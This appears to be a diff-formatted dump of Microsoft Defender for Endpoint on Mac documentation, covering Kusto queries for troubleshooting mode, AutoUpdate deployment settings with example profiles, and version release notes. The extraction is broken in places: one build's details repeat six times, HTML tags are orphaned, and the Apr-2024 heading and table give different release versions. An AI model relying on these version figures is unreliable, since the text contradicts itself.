-
-### Get troubleshooting events for a particular device
-
-You can use the following query to search by `deviceId` or `deviceName` by commenting out the respective lines.
-
-```kusto
-//let deviceName = "<deviceName>"; // update with device name
-let deviceId = "<deviceID>"; // update with device id
-DeviceEvents
-| where DeviceId == deviceId
-//| where DeviceName == deviceName
-| where ActionType == "AntivirusTroubleshootModeEvent"
-| extend _tsmodeproperties = parse_json(AdditionalFields)
-| project Timestamp,DeviceId, DeviceName, _tsmodeproperties,
- _tsmodeproperties.TroubleshootingState, _tsmodeproperties.TroubleshootingPreviousState, _tsmodeproperties.TroubleshootingStartTime,
- _tsmodeproperties.TroubleshootingStateExpiry, _tsmodeproperties.TroubleshootingStateRemainingMinutes,
- _tsmodeproperties.TroubleshootingStateChangeReason, _tsmodeproperties.TroubleshootingStateChangeSource
-```
-
-### Devices currently in troubleshooting mode
-
-You can find the devices that are currently in troubleshooting mode using the following query:
-
-```kusto
-DeviceEvents
-| where Timestamp > ago(3h) // troubleshooting mode automatically disables after 4 hours
-| where ActionType == "AntivirusTroubleshootModeEvent"
-| extend _tsmodeproperties = parse_json(AdditionalFields)
-| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
-|summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by DeviceId
-| order by Timestamp desc
-```
-
-### Count of troubleshooting mode instances by device
-
-You can find the number of troubleshooting mode instances for a device using the following query:
-
-```kusto
-DeviceEvents
-| where ActionType == "AntivirusTroubleshootModeEvent"
-| extend _tsmodeproperties = parse_json(AdditionalFields)
-| where Timestamp > ago(30d) // choose the date range you want
-| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
-| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count() by DeviceId
-| sort by count_
-```
-
-### Total count
-
-You can know the total count of troubleshooting mode instances using the following query:
-
-```kusto
-DeviceEvents
-| where ActionType == "AntivirusTroubleshootModeEvent"
-| extend _tsmodeproperties = parse_json(AdditionalFields)
-| where Timestamp > ago(2d) //beginning of time range
-| where Timestamp < ago(1d) //end of time range
-| where _tsmodeproperties.TroubleshootingStateChangeReason contains "started"
-| summarize (Timestamp, ReportId)=arg_max(Timestamp, ReportId), count()
-| where count_ > 5 // choose your max # of TS mode instances for your time range
-```
-
-## Recommended content
--- [Microsoft Defender XDR for Endpoint on Mac](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender XDR for Endpoint integration with Microsoft Defender XDR for Cloud Apps](/defender-cloud-apps/mde-integration)-- [Get to know the innovative features in Microsoft Edge](https://www.microsoft.com/edge/features?form=MW00UY)-- [Protect your network](network-protection.md)-- [Turn on network protection](enable-network-protection.md)-- [Web protection](web-protection-overview.md)-- [Create indicators](manage-indicators.md)-- [Web content filtering](web-content-filtering.md)-
security Mac Updates https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-updates.md
- Title: Deploy updates for Microsoft Defender for Endpoint on Mac
-description: Control updates for Microsoft Defender for Endpoint on Mac in enterprise environments.
------- m365-security-- tier3-- mde-macos-- Previously updated : 12/18/2020--
-# Deploy updates for Microsoft Defender for Endpoint on macOS
---
-**Applies to:**
--- [Microsoft Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft regularly publishes software updates to improve performance, security, and to deliver new features.
-
-> [!WARNING]
-> Each version of Defender for Endpoint on macOS is set to expire automatically after 6 months. While expired versions continue to receive security intelligence updates, we recommend that you install the latest version to get all available improvements and enhancements. <br>
-> To check the expiration date, run the following command:
-> ```bash
-> mdatp health --field product_expiration
-> ```
-
-To update Microsoft Defender for Endpoint on macOS, a program named Microsoft AutoUpdate (MAU) is used. MAU checks updates periodically, and automatically downloads and installs them.
--
-You can deploy preferences to configure how and when MAU checks for updates for the Macs in your organization.
-
-## Use msupdate
-
-MAU includes a command-line tool, called *msupdate*, that is designed for IT administrators so that they have more precise control over when updates are applied. Instructions for how to use this tool can be found in [Update Office for Mac by using msupdate](/deployoffice/mac/update-office-for-mac-using-msupdate).
-
-In MAU, the application identifier for Microsoft Defender for Endpoint on macOS is *WDAV00*. To download and install the latest updates for Microsoft Defender for Endpoint on macOS, execute the following command from a Terminal window:
-
-```dos
-cd /Library/Application\ Support/Microsoft/MAU2.0/Microsoft\ AutoUpdate.app/Contents/MacOS
-./msupdate --install --apps wdav00
-```
-
-## Set preferences for Microsoft AutoUpdate
-
-This section describes the most common preferences that can be used to configure MAU. These settings can be deployed as a configuration profile through the management console that your enterprise is using. An example of a configuration profile is shown in the following sections.
-
-### Set the channel name
-
-The channel determines the type and frequency of updates that are offered through MAU. Devices in `Beta` can try out new features before devices in `Preview` and `Current`.
-
-The `Current` channel contains the most stable version of the product.
-
-> [!IMPORTANT]
-> Prior to Microsoft AutoUpdate version 4.29, channels had different names:
->
-> - `Beta Channel` was named `InsiderFast` (Insider Fast)
-> - `Current Channel` (Preview) was named `External` (Insider Slow)
-> - `Current Channel` was named `Production`
-
-> [!TIP]
-> In order to preview new features and provide early feedback, it is recommended that you configure some devices in your enterprise to `Beta` or `Preview`.
-
-<br>
-----
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.autoupdate2`|
-|**Key**|ChannelName|
-|**Data type**|String|
-|**Possible values**|Beta <p> Preview <p> Current|
-|||
-
-> [!WARNING]
-> This setting changes the channel for all applications that are updated through Microsoft AutoUpdate. To change the channel only for Microsoft Defender for Endpoint on macOS, execute the following command after replacing `[channel-name]` with the desired channel:
->
-> ```bash
-> defaults write com.microsoft.autoupdate2 Applications -dict-add "/Applications/Microsoft Defender.app" " { 'Application ID' = 'WDAV00' ; 'App Domain' = 'com.microsoft.wdav' ; LCID = 1033 ; ChannelName = '[channel-name]' ; }"
-> ```
-
-### Set update check frequency
-
-Change how often MAU searches for updates.
-<br>
-----
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.autoupdate2`|
-|**Key**|UpdateCheckFrequency|
-|**Data type**|Integer|
-|**Default value**|720 (minutes)|
-|**Comment**|This value is set in minutes. The allowed range is 240 minutes (4 hours) - 720 minutes (12 hours).|
-|||
-
-### Change how MAU interacts with updates
-
-Change how MAU searches for updates.
-<br>
-----
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.autoupdate2`|
-|**Key**|HowToCheck|
-|**Data type**|String|
-|**Possible values**|Manual <p> AutomaticCheck <p> AutomaticDownload|
-|**Comment**|Note that AutomaticDownload will download and install silently if possible.|
-|||
-
-### Change whether the "Check for Updates" button is enabled
-
-Change whether local users are able to click the "Check for Updates" option in the Microsoft AutoUpdate user interface.
-<br>
-----
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.autoupdate2`|
-|**Key**|EnableCheckForUpdatesButton|
-|**Data type**|Boolean|
-|**Possible values**|True (default) <p> False|
-|||
-
-### Disable Insider checkbox
-
-Set to true to make the "Join the Office Insider Program..." checkbox unavailable / greyed out to users.
-<br>
-----
-****
-
-|Section|Value|
-|||
-|**Domain**|`com.microsoft.autoupdate2`|
-|**Key**|DisableInsiderCheckbox|
-|**Data type**|Boolean|
-|**Possible values**|False (default) <p> True|
-|||
-
-## Example configuration profile
-
-The following configuration profile is used to:
--- Place the device in the Current channel-- Automatically download and install updates-- Enable the "Check for updates" button in the user interface-- Allow users on the device to enroll into the Insider channels-
-> [!WARNING]
-> The below configuration is an example configuration and should not be used in production without proper review of settings and tailor of configurations.
-
-### Jamf Pro
-
-```XML
-<?xml version="1.0" encoding="UTF-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1.0">
-<dict>
- <key>ChannelName</key>
- <string>Current</string>
- <key>HowToCheck</key>
- <string>AutomaticDownload</string>
- <key>EnableCheckForUpdatesButton</key>
- <true/>
- <key>DisableInsiderCheckbox</key>
- <false/>
-</dict>
-</plist>
-```
-
-### Intune
-
-```XML
-<?xml version="1.0" encoding="utf-8"?>
-<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
-<plist version="1">
- <dict>
- <key>PayloadUUID</key>
- <string>B762FF60-6ACB-4A72-9E72-459D00C936F3</string>
- <key>PayloadType</key>
- <string>Configuration</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.autoupdate2</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft AutoUpdate settings</string>
- <key>PayloadDescription</key>
- <string>Microsoft AutoUpdate configuration settings</string>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>PayloadRemovalDisallowed</key>
- <true/>
- <key>PayloadScope</key>
- <string>System</string>
- <key>PayloadContent</key>
- <array>
- <dict>
- <key>PayloadUUID</key>
- <string>5A6F350A-CC2C-440B-A074-68E3F34EBAE9</string>
- <key>PayloadType</key>
- <string>com.microsoft.autoupdate2</string>
- <key>PayloadOrganization</key>
- <string>Microsoft</string>
- <key>PayloadIdentifier</key>
- <string>com.microsoft.autoupdate2</string>
- <key>PayloadDisplayName</key>
- <string>Microsoft AutoUpdate configuration settings</string>
- <key>PayloadDescription</key>
- <string/>
- <key>PayloadVersion</key>
- <integer>1</integer>
- <key>PayloadEnabled</key>
- <true/>
- <key>ChannelName</key>
- <string>Current</string>
- <key>HowToCheck</key>
- <string>AutomaticDownload</string>
- <key>EnableCheckForUpdatesButton</key>
- <true/>
- <key>DisableInsiderCheckbox</key>
- <false/>
- </dict>
- </array>
- </dict>
-</plist>
-```
-
-To configure MAU, you can deploy this configuration profile from the management tool that your enterprise is using:
--- From Jamf Pro, upload this configuration profile and set the Preference Domain to *com.microsoft.autoupdate2*.-- From Intune, upload this configuration profile and set the custom configuration profile name to *com.microsoft.autoupdate2*.-
-## Resources
--- [msupdate reference](/deployoffice/mac/update-office-for-mac-using-msupdate)
security Mac Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-whatsnew.md
- Title: What's new in Microsoft Defender for Endpoint on Mac
-description: Learn about the major changes for previous versions of Microsoft Defender for Endpoint on Mac.
--- Previously updated : 02/25/2024---- m365-security-- tier3-- mde-macos-----
-# What's new in Microsoft Defender for Endpoint on Mac
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-For more information on Microsoft Defender for Endpoint on other operating systems:
--- [What's new in Microsoft Defender for Endpoint on Linux](linux-whatsnew.md)-- [What's new in Microsoft Defender for Endpoint on iOS](ios-whatsnew.md)--
-**Troubleshooting mode for macOS**
-
-Troubleshooting mode helps you identify instances where antivirus might be causing issues with your applications or system resources. To learn more, see [Troubleshooting mode in Microsoft Defender for Endpoint on macOS](mac-troubleshoot-mode.md).
-
-**Mac devices receive built-in protection**
-
-Tamper protection is turned on in block mode by default. This setting helps secure your Mac against threats. To learn more, see [Protect macOS security settings with tamper protection](built-in-protection.md).
-
-**Network protection available for macOS**
-
-Network protection for macOS is now available for all Mac devices onboarded to Defender for Endpoint. Devices must meet the minimum requirements. To learn more, see [Use network protection to help prevent macOS connections to bad sites](/microsoft-365/security/defender-endpoint/network-protection-macos).
-
-**Known issues**
-
-Apple fixed an issue on macOS [Ventura upgrade](<https://developer.apple.com/documentation/macos-release-notes/macos-13_1-release-notes>), which is fixed with the latest OS update. The issue impacts Microsoft Defender for Endpoint security extensions, and might result in losing Full Disk Access Authorization, impacting its ability to function properly.
-
-In macOS Sonoma 14.3.1, Apple made a change to the [handling of Bluetooth devices](https://developer.apple.com/forums/thread/738748) that impacts Defender for Endpoint device controls ability to intercept and block access to Bluetooth devices. At this time, the recommended mitigation is to use a version of macOS less than 14.3.1.
-
-**Sonoma support**
-
-Microsoft Defender supports macOS Sonoma (14.0) in the current Defender release.
-
-**macOS Deprecation**
-Microsoft Defender for Endpoint no longer supports Big Sur (11)
-
-### Apr-2024 (Build: 101.24032.0006 | Release version: 20.124032.06.0)
-
-| Build: | **101.24032.0006** |
-|--|--|
-| Release version: | **20.124012.10.0** |
-| Engine version: | **1.1.24030.4** |
-| Signature version: | **1.407.521.0** |
-
-##### What's new
--- Improvements to `mdatp threat` command-- Remove Big Sur from supported versions of macOS-- [device control] Fix Bluetooth support on Sonoma (see Note below)-- Bug and performance fixes-
- > [!NOTE]
- > You need to deploy a new MDM configuration profile for Defender to access Bluetooth.
- > See details for [JAMF](mac-jamfpro-policies.md#step-10-grant-bluetooth-permissions) and [Intune](mac-install-with-intune.md#step-7-bluetooth-permissions)
-
-### Mar-2024 (Build: 101.24012.0010 | Release version: 20.124012.10.0)
-
-| Build: | **101.24012.0010** |
-|--|--|
-| Release version: | **20.124012.10.0** |
-| Engine version: | **1.1.24020.3** |
-| Signature version: | **1.405.788.0** |
-
-##### What's new
--- Bug and performance fixes-- **(GA) Built-in Scheduled Scan for macOS**: For information on Scheduled Scan built-in for Microsoft Defender for Endpoint on macOS, see [How to schedule scans with Microsoft Defender for Endpoint on macOS](mac-schedule-scan.md).-
-### Jan-2024 (Build: 101.23122.0005 | Release version: 20.123122.5.0)
-
-| Build: | **101.23122.0005** |
-|--|--|
-| Release version: | **20.123122.5.0** |
-| Engine version: | **1.1.23100.2010** |
-| Signature version: | **1.403.3022.0** |
-
-##### What's new
--- [[device control](mac-device-control-overview.md)] Fixes for Bluetooth devices support-- Bug and performance fixes-
-### Dec-2023 (Build: 101.23102.0020 | Release version: 20.123102.20.0)
-
-| Build: | **101.23102.0020** |
-|--|--|
-| Release version: | **20.123102.20.0** |
-| Engine version: | **1.1.23090.2005** |
-| Signature version: | **1.401.1729.0** |
-
-##### What's new
--- Bug and performance fixes-
-### Nov-2023 (Build: 101.23092.0007 | Release version: 20.123092.7.0)
-
-| Build: | **101.23092.0007** |
-|--|-|
-| Release version: | **20.123092.7.0** |
-| Engine version: | **1.1.23090.2005** |
-| Signature version: | **1.399.1196.0** |
-
-##### What's new
--- [[device control](mac-device-control-overview.md)] set policy for DCv2 via 'mdatp config'-- Configuration loading - error logged to /Library/Logs/Microsoft/mdatp/microsoft_defender_core_err.log includes bad property name in JSON-
-> [!NOTE]
-> If you use Device Control v1, consider migrating to v2 (that includes all v1 functionality and more).
-> Device Control v1 will be considered deprecated in the nearest future.
-> To check, run the `[mdatp health --details device_control](mac-device-control-overview.md#status)` command, and inspect the `active` property, it should not contain "v1".
-
-### Oct-2023 (Build: 101.23082.0018 | Release version: 20.123082.18.0)
-
-| Build: | **101.23082.0018** |
-|--|-|
-| Release version: | **20.123082.18.0** |
-| Engine version: | **1.1.23070.1002** |
-| Signature version: | **1.399.384.0** |
-
-##### What's new
--- [[device control](mac-device-control-overview.md)] Detailed status with `mdatp health --details device_control`-- [[device control](mac-device-control-overview.md)] `mdatp config device-control policy` to [set policy](mac-device-control-manual.md) on a nonmanaged machine-- Bug and performance fixes-
-### Sep-2023 (Build: 101.23072.0025 | Release version: 20.123072.25.0)
-
-| Build: | **101.23072.0025** |
-|--|--|
-| Release version: | **20.123072.25.0** |
-| Engine version: | **1.1.23050.3** |
-| Signature version: | **1.397.911.0** |
-
-##### What's new
--- Bug and performance fixes-- Fix: Security Portal events might have missed ancestors details for short lived processes-- Fix: Major performance issues on macOS when Network Protection is set to Audit mode-
-### Aug-2023 (Build: 101.23062.0016 | Release version: 20.123062.16.0)
-
-| Build: | **101.23062.0016** |
-|--|--|
-| Release version: | **20.123062.16.0** |
-| Engine version: | **1.1.23050.3** |
-| Signature version: | **1.395.436.0** |
-
-##### What's new
--- Bug and performance fixes-- Fix: macOS complains that uninstall background task is from unidentified developer-
-### Jul-2023 (Build: 101.23052.0004 | Release version: 20.123052.4.0)
-
-| Build: | **101.23052.0004** |
-|--|--|
-| Release version: | **20.123052.4.0** |
-| Engine version: | **1.1.20100.7** |
-| Signature version: | **1.391.2163.0** |
-
-##### What's new
--- Client version schema change-- Fix: Defender doesn't start on a machine with certain versions of Microsoft Edge due to directory permission issue-- Bug and performance fixes-
-### Jun-2023 (Build: 101.98.84 | Release version: 20.123042.19884.0)
-
-| Build: | **101.98.84** |
-|--|--|
-| Release version: | **20.123042.19884.0** |
-| Engine version: | **1.1.20300.4** |
-| Signature version: | **1.391.221.0** |
-
-##### What's new
--- System Extensions health command `mdatp health --details system_extensions`-- Bug and performance fixes-
-### May-2023 (Build: 101.98.71 | Release version: 20.123032.19871.0)
-
-| Build: | **101.98.71** |
-|--|--|
-| Release version: | **20.123032.19871.0** |
-| Engine version: | **1.1.20300.4** |
-| Signature version: | **1.389.1872.0** |
-
-##### What's new
--- Tamper Protection health command `mdatp health --details tamper_protection`-- Tamper Protection - [MDM processes exclusions](tamperprotection-macos.md#exclusions)-- Fix: Remove Codesigned Artifact from App Bundle-- Bug and performance fixes-
-### May-2023 (Build: 101.98.70 | Release version: 20.123022.19870.0)
-
-| Build: | **101.98.70** |
-|--|--|
-| Release version: | **20.123022.19870.0** |
-| Engine version: | **1.1.20300.4** |
-| Signature version: | **1.389.1396.0** |
-
-##### What's new
--- Bug and performance fixes-
-### Mar-2023 (Build: 101.98.30 | Release version: 20.123012.19830.0)
-
-| Build: | **101.98.30** |
-|--|--|
-| Release version: | **20.123012.19830.0** |
-| Engine version: | **1.1.20100.6** |
-| Signature version: | **1.385.924.0** |
-
-##### What's new
--- Bug and performance fixes-
-### Feb-2023 (Build: 101.97.94 | Release version: 20.123011.19794.0)
-
-| Build: | **101.97.94** |
-|--|--|
-| Release version: | **20.123011.19794.0** |
-| Engine version: | **1.1.20000.2** |
-| Signature version: | **1.383.104.0** |
-
-##### What's new
--- Improved performance, stability, and security-- Bug fixes-- Discontinued support macOS Catalina [10.15]-
-<br/>
-
-&ensp;Build: **101.96.85**<br/>
-&ensp;Release version: **20.122112.19413.0**<br/>
-&ensp;Engine version: **1.1.19900.2**<br/>
-&ensp;Signature version: **1.381.2029.0**<br/>
-
-&ensp;Build: **101.96.85**<br/>
-&ensp;Release version: **20.122112.19413.0**<br/>
-&ensp;Engine version: **1.1.19900.2**<br/>
-&ensp;Signature version: **1.381.2029.0**<br/>
-
-&ensp;Build: **101.96.85**<br/>
-&ensp;Release version: **20.122112.19413.0**<br/>
-&ensp;Engine version: **1.1.19900.2**<br/>
-&ensp;Signature version: **1.381.2029.0**<br/>
-
-&ensp;Build: **101.96.85**<br/>
-&ensp;Release version: **20.122112.19413.0**<br/>
-&ensp;Engine version: **1.1.19900.2**<br/>
-&ensp;Signature version: **1.381.2029.0**<br/>
-
-&ensp;Build: **101.96.85**<br/>
-&ensp;Release version: **20.122112.19413.0**<br/>
-&ensp;Engine version: **1.1.19900.2**<br/>
-&ensp;Signature version: **1.381.2029.0**<br/>
-
-&ensp;Build: **101.96.85**<br/>
-&ensp;Release version: **20.122112.19413.0**<br/>
-&ensp;Engine version: **1.1.19900.2**<br/>
-&ensp;Signature version: **1.381.2029.0**<br/>
-
-**What's new**
--- Bug and performance fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.90.97**<br/>
-&ensp;Release version: **20.122102.19097.0**<br/>
-&ensp;Engine version: **1.1.19900.2**<br/>
-&ensp;Signature version: **1.381.202.0**<br/>
-
-**What's new**
--- Scanning optimization for move file operations-- Adding exclusions from command line now requires admin privileges-- Decrease sysextd noise from Tamper Protection in Advanced Hunting-- Bug and performance fixes-
-<br/>
-</details>
-
-&ensp;Released: **Nov 5, 2022**<br/>
-&ensp;Published: **Nov 5, 2022**<br/>
-&ensp;Build: **101.87.30**<br/>
-&ensp;Release version: **20.122082.18681.0**<br/>
-&ensp;Engine version: **1.1.19700.3**<br/>
-&ensp;Signature version: **1.379.17.0**<br/>
-
-**What's new**
--- Fix for some users experiencing performance issues and temporary system hangs-- Bug and performance fixes-
-<br/>
-</details>
-
-&ensp;Released: **Oct 25, 2022**<br/>
-&ensp;Published: **Oct 25, 2022**<br/>
-&ensp;Build: **101.86.81**<br/>
-&ensp;Release version: **20.122082.18681.0**<br/>
-&ensp;Engine version: **1.1.19700.3**<br/>
-&ensp;Signature version: **1.377.636.0**<br/>
-
-**What's new**
--- Bug fix: Upgrade fails if `\_mdatp` user a member of `\_lpadmin` group-
-<br/>
-</details>
-
-> [!IMPORTANT]
-> This is a minimal recommended MDE version for macOS Ventura.
-
-<details>
- <summary>Oct-2022 (Build: 101.82.21 | Release version: 20.122082.18221.0)</summary>
-
-&ensp;Build: **101.82.21**<br/>
-&ensp;Release version: **20.122082.18221.0**<br/>
-&ensp;Engine version: **1.1.19400.3**<br/>
-&ensp;Signature version: **1.369.962.0**<br/>
-
-**What's new**
--- Bug fix - Mac TP in Block mode causing device hang on shutdown/crashes on reboot-- Add a mdatp command-line switch to view the on-demand scan history-- Improve Performance of Device Owner on macOS-- Ready for macOS Ventura (13.0)-- Bug and performance fixes-
-<br/>
-</details>
-
-&ensp;Build: **101.78.13**<br/>
-&ensp;Release version: **20.122072.17813.0**<br/>
-&ensp;Engine version: **1.1.19500.2**<br/>
-&ensp;Signature version: **1.373.556.0**<br/>
-
-**What's new**
--- Fix for uninstaller to properly delete Application Support folder-- Fix for Network Protection not filtering Safari when Firewall or iCloud Private Relay is on-- Fix for osqueryui zombie processes-- Fix for UI crash on Ventura-- Fix for definitions not getting downloaded right after install-- Other bug fixes-
-<br/>
-</details>
-
-&ensp;Released: **Aug 3, 2022**<br/>
-&ensp;Published: **Aug 3, 2022**<br/>
-&ensp;Build: **101.75.90**<br/>
-&ensp;Release version: **20.122071.17590.0**<br/>
-&ensp;Engine version: **1.1.19300.3**<br/>
-&ensp;Signature version: **1.369.395.0**<br/>
-
-**What's new**
--- Added a new field in the output of `mdatp health` that can be used to query the enforcement level of the network protection feature. The new field is called `network_protection_enforcement_level` and can take one of the following values: `audit`, `block`, or `disabled`.-- Addressed a product bug where multiple detections of the same content could lead to duplicate entries in the threat history.-- Other bug fixes.-
-<br/>
-</details>
-
-&ensp;Released: **Jul 21, 2022**<br/>
-&ensp;Published: **Jul 21, 2022**<br/>
-&ensp;Build: **101.73.77**<br/>
-&ensp;Release version: **20.122062.17377.0**<br/>
-&ensp;Engine version: **1.1.19200.3**<br/>
-&ensp;Signature version: **1.367.1011.0**<br/>
-
-**What's new**
--- Addressed an issue where printing couldn't be completed successfully due to the network extension-- Added an option to [configure file hash computation](mac-preferences.md#configure-file-hash-computation-feature)-- From this build onwards, the product has the new anti-malware engine by default-- Performance improvements for file copy operations-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Released: **Jul 7, 2022**<br/>
-&ensp;Published: **Jul 7, 2022**<br/>
-&ensp;Build: **101.71.18**<br/>
-&ensp;Release version: **20.122052.17118.0**<br/>
-
-**What's new**
--- `mdatp connectivity test` added an extra URL. The new URL is [https://go.microsoft.com/fwlink/?linkid=2144709](https://go.microsoft.com/fwlink/?linkid=2144709).-- Up until now, the product log level didn't persist between product restarts. Beginning in this version, there's a new command-line tool switch that persists the log level. The new command is `mdatp log level persist --level <level>`.-- Fixed a bug in the product installation package that in rare cases could lead a loss of product state during updates-- Performance improvements for file copy operations and built-in macOS applications-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Released: **Jun 14, 2022**<br/>
-&ensp;Published: **Jun 14, 2022**<br/>
-&ensp;Build: **101.70.19**<br/>
-&ensp;Release version: **20.122051.17019.0**<br/>
-
-**What's new**
--- Fixed a bug where threat-related notifications weren't always presented to the end user.-- Performance improvements & other updates.-
-<br/>
-</details>
-
-&ensp;Released: **Jun 2, 2022**<br/>
-&ensp;Published: **Jun 2, 2022**<br/>
-&ensp;Build: **101.70.18**<br/>
-&ensp;Release version: **20.122042.17018.0**<br/>
-
-**What's new**
--- Fixed a bug where the installation package was sometimes hanging indefinitely during product updates-- Fixed a bug where the product sometimes was incorrectly detecting files inside the quarantine folder-- Performance improvements & other bug fixes-
-<br/>
-</details>
-
-&ensp;Released: **May 11, 2022**<br/>
-&ensp;Published: **May 11, 2022**<br/>
-&ensp;Build: **101.66.54**<br/>
-&ensp;Release version: **20.122041.16654.0**<br/>
-
-**What's new**
--- Addressed an issue where `mdatp diagnostic real-time-protection-statistics` wasn't printing the correct process path in some cases.-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Released: **Apr 26, 2022**<br/>
-&ensp;Published: **Apr 26, 2022**<br/>
-&ensp;Build: **101.64.15**<br/>
-&ensp;Release version: **20.122032.16415.0**<br/>
-
-**What's new**
--- Fixed a regression introduced in version 101.61.69 where the status menu icon was sometimes showing an error icon, even though no action was required from the end user-- Improved the `conflicting_applications` field in `mdatp health` to show only the most recent 10 processes and also to include the process names. This makes it easier to identify which processes are potentially conflicting with Microsoft Defender for Endpoint for Mac.-- Fixed a bug in `mdatp device-control removable-media policy list` where vendor ID and product ID were displayed as decimal instead of hexadecimal-- Performance improvements & other bug fixes-
-<br/>
-</details>
-
-&ensp;Released: **Mar 25, 2022**<br/>
-&ensp;Published: **Mar 25, 2022**<br/>
-&ensp;Build: **101.61.69**<br/>
-&ensp;Release version: **20.122022.16169.0**<br/>
-
-**What's new**
--- Bug fixes-
-<br/>
-</details>
-
-&ensp;Released: **Mar 8, 2022**<br/>
-&ensp;Published: **Mar 8, 2022**<br/>
-&ensp;Build: **101.60.91**<br/>
-&ensp;Release version: **20.122021.16091.0**<br/>
-
-**What's new**
--- This version contains a security update for [CVE-2022-23278](https://msrc-blog.microsoft.com/2022/03/08/guidance-for-cve-2022-23278-spoofing-in-microsoft-defender-for-endpoint/)-
-<br/>
-</details>
-
-&ensp;Released: **Feb 28, 2022**<br/>
-&ensp;Published: **Feb 28, 2022**<br/>
-&ensp;Build: **101.59.50**<br/>
-&ensp;Release version: **20.122021.15950.0**<br/>
-
-**What's new**
--- This version adds support for macOS 12.3. Starting with macOS 12.3, [Apple is removing Python 2.7](https://developer.apple.com/documentation/macos-release-notes/macos-12_3-release-notes). There's no Python version preinstalled on macOS by default. **ACTION NEEDED**:
- - Users must update Microsoft Defender for Endpoint for Mac to version 101.59.50 (or newer) before updating their devices to macOS Monterey 12.3 (or newer). This minimal version 101.59.50 is a prerequisite to eliminating Python-related issues with Microsoft Defender for Endpoint for Mac on macOS Monterey.
- - For remote deployments, existing MDM setups must be updated to Microsoft Defender for Endpoint for Mac version 101.59.50 (or newer). Pushing via MDM an older Microsoft Defender for Endpoint for Mac version to macOS Monterey 12.3 (or newer) results in an installation failure.
-\*\*\n
-<br/>
-</details>
-
-<details>
- <summary>Feb-2022 (Build: 101.59.10 | Release version: 20.122012.15910.0)</summary>
-
-&ensp;Released: **Feb 22, 2022**<br/>
-&ensp;Published: **Feb 22, 2022**<br/>
-&ensp;Build: **101.59.10**<br/>
-&ensp;Release version: **20.122012.15910.0**<br/>
-
-**What's new**
--- The command-line tool now supports restoring quarantined files to a location other than the one where the file was originally detected. This can be done through `mdatp threat quarantine restore --id [threat-id] --path [destination-folder]`.-- Extended device control to handle devices connected over Thunderbolt 3-- Improved the handling of device control policies containing invalid vendor IDs and product IDs. Before this version, if the policy contained one or more invalid IDs, the entire policy was ignored. Starting from this version, only the invalid portions of the policy are ignored. Issues with the policy are surfaced through `mdatp device-control removable-media policy list`.-- Bug fixes-
-<br/>
-</details>
-
-&ensp;Released: **Feb 7, 2022**<br/>
-&ensp;Published: **Feb 7, 2022**<br/>
-&ensp;Build: **101.56.62**<br/>
-&ensp;Release version: **20.121122.15662.0**<br/>
-
-**What's new**
--- Bug fixes-
-<br/>
-</details>
-
-&ensp;Released: **Jan 30, 2022**<br/>
-&ensp;Published: **Jan 30, 2022**<br/>
-&ensp;Build: **101.56.35**<br/>
-&ensp;Release version: **20.121121.15635.0**<br/>
-
-**What's new**
--- The application is renamed from "Microsoft Defender ATP" to "Microsoft Defender". End users observe the following changes:-- The application installation path has been changed from `/Application/Microsoft Defender ATP.app` to `/Applications/Microsoft Defender.app`.-- Within the user experience, occurrences of "Microsoft Defender ATP" have been replaced with "Microsoft Defender"-- Resolved an issue where some VPN applications couldn't connect due to the network content filter that is distributed with Microsoft Defender for Endpoint for Mac-- Addressed an issue discovered in macOS 12.2 preview 2 where the installation package couldn't be opened due to a change in the operating system (OS) that prevents installation of packages with certain characteristics. While it appears that this OS change isn't included in the final release of macOS 12.2, it's likely that it will be reintroduced in a future macOS version. As such, we encourage all enterprise administrators to refresh the Microsoft Defender for Endpoint package in their management console to this product version (or a newer version).-- Addressed an issue seen on some M1 devices where the product was stuck with invalid anti-malware definitions and couldn't successfully update to a working set of definitions.-- `mdatp health` output has been extended with a more attribute called `full_disk_access_enabled` that can be used to determine whether Full Disk Access has been granted to all components of Microsoft Defender for Endpoint for Mac.-- Performance improvements & bug fixes-
-<br/>
-</details>
-
